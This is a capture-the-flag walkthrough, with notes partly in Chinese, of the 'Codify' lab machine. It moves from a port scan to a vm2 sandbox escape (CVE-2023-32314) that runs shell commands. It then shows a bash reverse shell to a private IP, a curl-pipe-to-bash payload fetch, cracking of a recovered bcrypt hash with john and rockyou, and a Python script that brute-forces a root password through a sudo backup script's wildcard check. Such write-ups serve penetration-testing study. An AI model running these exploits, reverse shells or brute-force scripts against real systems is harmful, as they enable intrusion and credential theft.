# Codify ## 1.nmap scan  ``` sudo vim /etc/hosts ``` search "vm2 cve poc github"   ## 2.write code 稍微改一下程式碼 新增cmd='id' execSync更換為(cmd) ``` const {VM} = require("vm2"); const vm = new VM(); const code = ` cmd='id' err = {}; const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy(err, handler); try { throw proxiedErr; } catch ({constructor: c}) { c.constructor('return process')().mainModule.require('child_process').execSync(cmd); } ` console.log(vm.run(code)); ``` CVE-2023-32314 https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac ``` change execSync("echo hacked") ``` google search "reverse shell command" ``` bash -c 'bash -i >& /dev/tcp/10.10.14.9/9999 0>&1 ``` ``` const { VM } = require("vm2"); const vm = new VM(); const code = ` const err = new Error(); err.name = { toString: new Proxy(() => "", { apply(target, thiz, args) { const process = args.constructor.constructor("return process")(); throw process.mainModule.require("child_process").execSync("echo hacked").toString(); }, }), }; try { err.stack; } catch (stdout) { stdout; } `; console.log(vm.run(code)); ``` ｜可執行命令 view-source:html  ## 3.reverse shell google search "reverse shell command" and "bin bash" 組成： ``` #!/bin/bash bash -c 'bash -i >& /dev/tcp/10.10.14.47/9999 0>&1' ``` 將內容寫入[file].html並開啟80port http server  修改code: ``` execSync更換為('curl http:/10.10.14.47/ | bash') ``` 執行後取得reverse shell  ## 4.密碼破解 於/var/www/contact目錄 cat tickets.db資料庫檔案發現密碼雜奏  ``` sudo gzip -d rockyou.txt.gz ``` ``` echo '$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2' > cc.txt john --wordlist=/usr/share/wordlists/rockyou.txt cc.txt spongebob1 ```  ## 5.ssh login cat user.txt (flag1)  ## 6.提升權限 ``` sudo -l cat /opt/scripts/mysql-backup.sh ``` 發現mysql-backup.sh檔案內與密碼驗證相關  ``` import string import subprocess all = list(string.ascii_letters + string.digits) password = "" found = False while not found: for character in all: command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh" output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout if "Password confirmed!" in output: password += character print(password) break else: found = True ```